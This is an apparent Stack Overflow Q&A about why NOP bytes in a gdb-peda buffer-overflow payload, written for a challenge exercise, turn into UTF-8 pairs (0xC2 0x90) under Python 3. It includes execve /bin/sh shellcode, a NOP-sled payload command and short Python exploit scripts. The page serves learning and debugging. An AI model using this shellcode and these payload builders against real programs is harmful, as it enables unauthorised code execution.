How to fix GDB probable charset issue NOP 0x90 translating to 0x90c2 in memory?

Question

I ran into a strange problem while working on a challenge and exploiting an executable in Kali Linux with gdb-peda.

#>gdb -q someVulnerableBinary
gdb-peda$ python
>shellcode=(
>"\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"
>)
>end
gdb-peda$ pset arg '"\x90"*(76-len(shellcode)) + shellcode + "\x08\x04\xb4\x10"[::-1] + "C"*10'
gdb-peda$ r
Starting program: /home/theDude/Downloads/tmp/someVulnerableBinary 'j
                          XRh//shh/binã1ÉÍ°CCCCCCCCCC'
j
                                                        XRh//shh/binã1ÉÍ°CCCCCCCCCC

Program received signal SIGSEGV, Segmentation fault.

[----------------------------------registers-----------------------------------]
EAX: 0x804b410 --> 0x90c290c2 
EBX: 0x0 
ECX: 0x0 
EDX: 0x99 
ESI: 0x2 
EDI: 0xf7faf000 --> 0x1b2db0 
EBP: 0x90c290c2 
ESP: 0xffffda00 --> 0x90c290c2 
EIP: 0x90c290c2
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x90c290c2
[------------------------------------stack-------------------------------------]
0000| 0xffffda00 --> 0x90c290c2 
0004| 0xffffda04 --> 0x90c290c2 
0008| 0xffffda08 --> 0x90c290c2 
0012| 0xffffda0c --> 0x90c290c2 
0016| 0xffffda10 --> 0x90c290c2 
0020| 0xffffda14 --> 0x90c290c2 
0024| 0xffffda18 --> 0x90c290c2 
0028| 0xffffda1c --> 0xb6a90c2 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x90c290c2 in ?? ()
gdb-peda$
gdb-peda$ i r $eax
eax            0x804b410    0x804b410
gdb-peda$ x/20x $eax
0x804b410:  0x90c290c2  0x90c290c2  0x90c290c2  0x90c290c2
0x804b420:  0x90c290c2  0x90c290c2  0x90c290c2  0x90c290c2
0x804b430:  0x90c290c2  0x90c290c2  0x90c290c2  0x90c290c2
0x804b440:  0x90c290c2  0x90c290c2  0x90c290c2  0x90c290c2
0x804b450:  0x90c290c2  0x90c290c2  0x90c290c2  0x90c290c2
gdb-peda$ show charset
The host character set is "auto; currently UTF-8".
The target character set is "auto; currently UTF-8".
The target wide character set is "auto; currently UTF-32".

Tell me if you need more info, but apparently each NOP byte \x90 ends up in memory as the two bytes \xc2\x90 (shown as 0x90c2 in the little-endian dump above). I cannot figure out why this happens, whether the charset is the cause, or how to change it. I also could not find anything similar via Google or Stack Overflow.

I appreciate any help or advice. Thanks in advance.

This is unclear - the current problem seems to be that you have `0x90c290c2` in your program counter (presumably because you overwrote the return address on the stack). I'm not sure that has much to do with misinterpretation of the NOP opcode. — Oliver Charlesworth, Apr 18 '17 at 16:22
Start with getting %pc == 0x41424344 then worry about the shellcode. As stated, you're having issues getting program counter control which is step 1 — adam, Apr 27 '17 at 23:30

score 3 · Answer 1 · answered Jun 19 '17 at 07:57

I had the same problem when working on a challenge today. I'm not using gdb-peda, just regular gdb, but this post helped me. Basically, the 0x90c2 in your dump is the byte pair 0xC2 0x90 read as a little-endian value, and 0xC2 0x90 is the UTF-8 encoding of the character U+0090. I ran into the problem because I have both Python 2 and Python 3 installed: Python 2 treats strings as byte arrays, while Python 3 treats them as Unicode text, which gets encoded (here as UTF-8) when it is written out. As a solution, try a bytes literal such as b"\x90" instead of "\x90" in your call to pset arg. If gdb-peda doesn't let you do that, you can print the input string with Python 2 and pipe it in.
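To make the encoding step concrete, here is a minimal sketch, assuming Python 3. It shows how the text character "\x90" becomes two bytes under UTF-8, and how four of those bytes look when read as one little-endian 32-bit word, which is how x/x displays memory on x86. The variable names are only for illustration.

```python
import struct

nop_text = "\x90"                    # in Python 3 this is the code point U+0090, not a byte
encoded = nop_text.encode("utf-8")   # the bytes produced when that text is written as UTF-8
raw = b"\x90"                        # the single byte that was actually intended

# Two encoded NOPs are four bytes; read them as one little-endian 32-bit word
word = struct.unpack("<I", encoded * 2)[0]

print(encoded)     # b'\xc2\x90'
print(hex(word))   # 0x90c290c2
```

The second value matches what the register dump in the question shows in EIP and on the stack.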

This gives me \xc2\x90 (0x90c2 in gdb's little-endian view) on the stack:

$ python3 -c "print('\x90', 8)" > input.txt
$ gdb ./vuln-program
(gdb) run arg1 < input.txt

Executing python2 instead gives me \x90 on the stack:

$ python2 -c "print '\x90',8" > input.txt
$ gdb ./vuln-program
(gdb) run arg1 < input.txt

In theory, the following should also give me \x90 on the stack:

$ python3 -c "print(b'\x90', 8)" > input.txt
$ gdb ./vuln-program
(gdb) run arg1 < input.txt

In practice, the last input breaks for me: in Python 3, print() writes the text representation of a bytes object (the literal characters b'\x90') rather than the raw byte. Python 2's print writes the bytes of a string unchanged, so for now I'm just using Python 2 to write exploit strings.
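If you want to stay on Python 3, one option is to skip print() and write the bytes in binary mode. This is only a sketch under that assumption; `nop_sled` and the file name input.txt are illustrative choices, not something gdb requires.

```python
def nop_sled(count):
    """Return `count` raw 0x90 bytes (hypothetical helper)."""
    return b"\x90" * count


if __name__ == "__main__":
    # "wb" opens the file in binary mode, so no text encoding is applied
    with open("input.txt", "wb") as handle:
        handle.write(nop_sled(8))
```

When the bytes need to go to a pipe instead of a file, sys.stdout.buffer.write(nop_sled(8)) writes them unencoded in the same way.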

In your case, I haven't tested what is causing the conversion to UTF-8, but that call to python to create the shellcode would at least be creating Unicode text rather than raw bytes if your gdb is running Python 3.

Maybe another poster can give you the exact syntax to fix this natively in gdb.

After a long break I returned once again to this challenge. And your hints lead me into the right direction. — Tschabadu, Sep 28 '17 at 08:49

score 1 · Answer 2 · answered Sep 28 '17 at 09:03

After a long break I returned to this challenge once again, and your hints led me in the right direction.

After a little research I found this:

How to change the Python Interpreter that gdb uses?

I found out that gdb now uses Python 3 and that it is possible to recompile it with Python 2, which would be one workaround for this character set confusion.
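To check which Python a given gdb embeds, something like the following can be entered after gdb's `python` command and finished with `end`. It is a small sketch; `literal_is_bytes` is a name made up for illustration.

```python
import sys


def literal_is_bytes():
    """Return True when a plain "..." literal is a byte string (as in Python 2)."""
    return isinstance("\x90", bytes)


# Major version of the interpreter running this code, and how it treats "\x90"
print(sys.version_info[0], literal_is_bytes())
```

If the second value is False, a plain "\x90" is text and will be encoded before it reaches the target program.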

As a better solution however I used the help of this link here:

Exploit development in Python 3

And did the following workaround (adapted to Python 2):

$ cat exploit.py

#!/bin/python2

shellcode = ""
shellcode += "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"
offset=1231
nop = "\x90"
padding = "C"*10
eip = "\xff\xff\xff\xff"[::-1]
buff = nop*(offset-len(shellcode)) + shellcode + eip + padding
print buff

$ ./someVulnerableBinary `python2 exploit.py`

This worked fine for me.
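For reference, roughly the same payload can be built in Python 3 by using bytes throughout. This is a hedged sketch, not a tested exploit: `build_payload` and its parameters are hypothetical names, and the offset and return address are the placeholder values from the script above.

```python
import struct

# Same shellcode bytes as in exploit.py, written as a bytes literal
shellcode = (
    b"\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68"
    b"\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"
)


def build_payload(offset, ret_addr, pad_len=10):
    """Assemble NOP sled + shellcode + return address + padding as raw bytes."""
    nops = b"\x90" * (offset - len(shellcode))
    eip = struct.pack("<I", ret_addr)  # little-endian, replaces the "..."[::-1] trick
    return nops + shellcode + eip + b"C" * pad_len


# To emit the payload without any text encoding:
# import sys; sys.stdout.buffer.write(build_payload(1231, 0xFFFFFFFF))
```

Because every piece is a bytes object, no UTF-8 encoding step can turn \x90 into \xc2\x90.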
